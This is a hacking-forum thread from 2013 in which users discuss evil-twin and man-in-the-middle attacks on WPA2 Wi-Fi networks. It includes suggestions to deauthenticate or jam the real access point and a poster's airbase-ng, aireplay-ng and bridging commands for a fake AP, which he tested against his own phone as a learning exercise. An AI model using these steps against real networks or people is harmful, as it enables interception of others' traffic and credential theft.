MitM conceptual question

What's the best way to setup a home network? Why should I care about BGP?

MitM conceptual question

Post by gBarreras93 on Tue Nov 26, 2013 9:09 pm
([msg=78319]see MitM conceptual question[/msg])

Hello all,
I've read some Man in the Middle tutorials and demonstrations. I've never done it, though.
As far as I know, it's easy to execute a a MitM attack on a client connected to an open network.
The attacker only has to create a honeypot with the same essid as the open network where the client is connected. He may need to overlap the original network.
For that purpose, the client has to receive higher signal from the fake network than the original one. Then, the client is going to connect to the honeypot and he's going to be attacked by a MitM attack.

My question is: in a WEP/WPA/WPA2...Let's imagine a WPA2 network, which is protected by a password authentication.
The attacker has to create a honeypot whith the same essid and also set the same password as the original network, right?
Otherwise the client, who will try to connect automatically with the stored password, won't be able to connect to the network, because the passwords won't match.
In the case the fake network has different encryption configuracion from the original(like WEP, or open authentication), the client will not be able to match the original data remembered with the fake network, even if both have the same essid and bssid.
So, in order to do a MitM attack againts a client connected to a WEP/WPA/WPA2 you have to crack the password before. Is that correct?

Thaaaank you!


This is my first post, by the way Grin.
gBarreras93
New User
New User
 
Posts: 5
Joined: Tue Nov 26, 2013 9:07 pm
Blog: View Blog (0)


Re: MitM conceptual question

Post by WallShadow on Wed Nov 27, 2013 6:52 am
([msg=78324]see Re: MitM conceptual question[/msg])

I'll admit that i haven't practiced this stuff in a while, so i don't remember the details perfectly.

however, first: you are describing an evil twin attack. although you can further proceed to make it into a mitm attack if you pull it off properly.

now as far as i remember from reading and testing this stuff, NO. computers (esspecially wifi adapters) are terribly stupid. you would probably want to set up a open authentication AP because that is the easiest and attracts hosts really well. but what it also does is to skip the wifi password/authentication which you would otherwise have to match exactly with the old access point. just set up an open auth point with the same name, and it will invite hosts to join just as well as the authenticated one. the one thing you can't do is to protect the fake AP with a password or encryption that the victim doesn't know, that would screw it up.

from there you can do a number of things such as jam the original network to prevent it from catching the host, DoS the real AP to prevent it from connecting the client, de-auth some clients of the real AP to get them to "convert" over to your fake ap, or simply use a honeypot instead of an evil twin to catch the host no matter what essid it's scanning for.

<3
User avatar
WallShadow
Contributor
Contributor
 
Posts: 622
Joined: Tue Mar 06, 2012 9:37 pm
Blog: View Blog (0)


Re: MitM conceptual question

Post by gBarreras93 on Wed Nov 27, 2013 3:00 pm
([msg=78326]see Re: MitM conceptual question[/msg])

Yes, you're true, it's evil twin.
However, I would say I read in Backtrack5 R3 tutorial, wireless interfaces kind of associate (essid,encryption). So they do distinguish between an open and wpa networks even if both have the same essid.
I'm not sure, I will check it when I find some time.
Thank you for the response!
gBarreras93
New User
New User
 
Posts: 5
Joined: Tue Nov 26, 2013 9:07 pm
Blog: View Blog (0)


Re: MitM conceptual question

Post by TheKrimlin on Sun Dec 01, 2013 4:17 pm
([msg=78366]see Re: MitM conceptual question[/msg])

Only problem on doing ET on a secure connection no matter the pass is usually people have their connections set on auto connect. Problem lays in you would have to get their router to shut down and host your twin connection when they're trying to connect.

Another problem, if you boot their router and host yours when they try and connect most people don't configure their settings and therefor the password to their router is the numbers on their router. Logic is in when my internet goes down I go check the router. Lets say they get booted and you host yours and it pops up with the enter password they'll assume hey it's ok and go and check their router for the pass and see its offline.

It'll be tricky but doable.
TheKrimlin
New User
New User
 
Posts: 8
Joined: Thu Nov 28, 2013 2:08 am
Blog: View Blog (0)


Re: MitM conceptual question

Post by WallShadow on Sun Dec 01, 2013 6:32 pm
([msg=78371]see Re: MitM conceptual question[/msg])

TheKrimlin wrote:Only problem on doing ET on a secure connection no matter the pass is usually people have their connections set on auto connect. Problem lays in you would have to get their router to shut down and host your twin connection when they're trying to connect.


hence the
WallShadow wrote:jam the original network to prevent it from catching the host, DoS the real AP to prevent it from connecting the client, de-auth some clients of the real AP to get them to "convert" over to your fake ap, or simply use a honeypot instead of an evil twin to catch the host no matter what essid it's scanning for.


TheKrimlin wrote:Lets say they get booted and you host yours and it pops up with the enter password they'll assume hey it's ok and go and check their router for the pass and see its offline.


that's true, but that might signal to a vigilent user that they are being attacked.
User avatar
WallShadow
Contributor
Contributor
 
Posts: 622
Joined: Tue Mar 06, 2012 9:37 pm
Blog: View Blog (0)


Re: MitM conceptual question

Post by TheKrimlin on Mon Dec 02, 2013 12:02 am
([msg=78377]see Re: MitM conceptual question[/msg])

That's what I was getting at lol

This just seems like too much work when you could just target their router and capture all the packets to and from, and sift through them.
TheKrimlin
New User
New User
 
Posts: 8
Joined: Thu Nov 28, 2013 2:08 am
Blog: View Blog (0)


Re: MitM conceptual question

Post by WallShadow on Mon Dec 02, 2013 4:11 pm
([msg=78379]see Re: MitM conceptual question[/msg])

TheKrimlin wrote:This just seems like too much work when you could just target their router and capture all the packets to and from, and sift through them.


How are you going to sift through encrypted packets without the key?
User avatar
WallShadow
Contributor
Contributor
 
Posts: 622
Joined: Tue Mar 06, 2012 9:37 pm
Blog: View Blog (0)


Re: MitM conceptual question

Post by gBarreras93 on Thu Dec 05, 2013 5:46 pm
([msg=78414]see Re: MitM conceptual question[/msg])

WallShadow wrote:
TheKrimlin wrote:This just seems like too much work when you could just target their router and capture all the packets to and from, and sift through them.
How are you going to sift through encrypted packets without the key?

I support WallShadow, you cannot do that without having the key.

However, I'm missing something here, or it's simply quite easy.
What I would do is to send Deauthentication pakcets to the real AP so every client connected gets disconnected and it's not possible to connect to the real AP.
You've already set your fake AP (honeypot) with the same ESSID and without any authentication (Open Network).
If it's true that
WallShadow wrote:now as far as i remember from reading and testing this stuff, NO. computers (esspecially wifi adapters) are terribly stupid. you would probably want to set up a open authentication AP because that is the easiest and attracts hosts really well. but what it also does is to skip the wifi password/authentication which you would otherwise have to match exactly with the old access point. just set up an open auth point with the same name, and it will invite hosts to join just as well as the authenticated one

Then the client computer is going to connect to your honeypot automatically, maybe the client user is not even realizing that he got disconnected and connected again, or maybe the internet connection is established but the user client is not even using the computer.
Nevertheless, I still doubt a wifi manager (could be windows' one or ubuntu's) is such an idiot to autoconnect to a open network just because it has the same essid as a network it remembered. In my experience, sometimes even when I manually connect to an open network on Windows 7, it prompts me if I want to connect to a insecure network.

Thank you both for the participation :D

-- Sat Dec 07, 2013 11:21 am --

Yesterday I used Backtrack5 and my Android phone as the victim.
I tested it with my own WPA2 network.
I used airbase-ng to create a false Open Access Point in Backtrack with the same name as the honest wireless network.
I used aireplay-ng to send deauthentication packets specifying the MAC of the honest network AP (bssid) and the MAC of the victim (this is, the MAC of my phone, which can be seen sniffing packets airodump-ng, for instance).
WallShadow was right. When the phone receives some deauthentication packets, it automatically tries to connect to the fake open network with the same name.
So far the experiment shows it's possible (and easy) to make an Android phone connects to your fake Wireless Network.
Maybe Windows, Ubuntu or McOS don't behave this way.

Then, I tried to provide the victim internet connection so I can see all the packets sent. However the phone couldn't get an IP in the network so it kept trying for a while and then reconnected to the honest AP if deauth packets were not sent anymore.
I tried to build a bridge betwen my cable connection interface and the fake AP interface but it didin't work, or I didn't do it well.
I couldn't spend more than an hour so I left.
If you can make this last step work please let me know how.
Regards
gBarreras93
New User
New User
 
Posts: 5
Joined: Tue Nov 26, 2013 9:07 pm
Blog: View Blog (0)


Re: MitM conceptual question

Post by limdis on Sat Dec 07, 2013 6:22 pm
([msg=78420]see Re: MitM conceptual question[/msg])

I had this huge response half typed out but it seems you have done a lot of research on your own (which is so nice to see). I didn't want to be repeating things you already know. So I have a couple of questions for you instead.

1. Do you know why a MiTM won't work without the target network key?
2. Assuming this is a WPA2 encrypted network, are you unable to get the key?
3. How do you have your fake AP configured, and was it properly set to mimic the target network? (what is the command line you are running)
4. Did you properly bridge your wired interface with assigned IPs?
5. Did you make sure to enable IP forwarding?
"The quieter you become, the more you are able to hear..."
"Drink all the booze, hack all the things."
User avatar
limdis
Moderator
Moderator
 
Posts: 1429
Joined: Mon Jun 28, 2010 5:45 pm
Blog: View Blog (0)


Re: MitM conceptual question

Post by gBarreras93 on Sun Dec 08, 2013 9:58 am
([msg=78424]see Re: MitM conceptual question[/msg])

limdis wrote:I had this huge response half typed out but it seems you have done a lot of research on your own (which is so nice to see). I didn't want to be repeating things you already know. So I have a couple of questions for you instead.

1. Do you know why a MiTM won't work without the target network key?
2. Assuming this is a WPA2 encrypted network, are you unable to get the key?
3. How do you have your fake AP configured, and was it properly set to mimic the target network? (what is the command line you are running)
4. Did you properly bridge your wired interface with assigned IPs?
5. Did you make sure to enable IP forwarding?


First of all, I want to say I am not trying to spoof any actual client target. For the first two questions I can guess you think I'm trying to spy someone or something like that. I started this thread to know and experiment the real limitations of a MitM attack.
Here are the answers:

1. A MitM attack has nothing to do with the target network key from my point of view. A WPA2 network protected by a strong key is not easy to crack. And of course, without having the key, any packets sniffing you do it's useless because they are encrypted with a session key derived from the WPA2 key.
The goal of MitM is to be between the victim and the Internet. Thus, you are able to see or even modify all the information the victim is sending and receiving. In order to achieve that, you are going to create a fake AP and make the victim connect to it.

2. We assume the victim it's connected to a WPA2 encrypted network. As I said before, it's not easy to crack. Unless the key is generated from a known pattern(essid,password) included in Backtrack5, or it's a dictionary common word as "dog", "Miquel"... it will be unlikely to be cracked though a personal computer.

3, 4, 5. From now, I'm a newby. It was the first time I tried to set a fake AP. I followed the BackTrack 5 Penetration testing manual. This is:
airbase-ng --essid <honest_network_essid> -c <whichever_allowed_channel> mon0 //set fake AP
echo > 1 / proc/sys/net/ipv4/ip_forward //Enable IP forwarding
brctl addbr mitm-bridge //set bridge
brctl addif mitm-bridge eth0 //add cable interface to bridge
brctl addif mitm-bridge at0 //add fake AP interface to bridge
ifconfig eth 0 0.0.0.0 up
ifconfig at0 0.0.0.0 up
ifconfig mitm-bridge 192.168.0.199 up //I'm not sure I executed this command or not. I probably forgot it, cause I didnt have much time so I was in a hurry. That's the reason why it didn't work completely I think.
//By the way, if anyone knows the command to use a DHCP client to assing the IP's automatically, please let me know it

That's all. Again, thank you for the participation and please do not hesitate in making any corrections. I'm here to learn.
gBarreras93
New User
New User
 
Posts: 5
Joined: Tue Nov 26, 2013 9:07 pm
Blog: View Blog (0)



Return to Networking

Who is online

Users browsing this forum: No registered users and 0 guests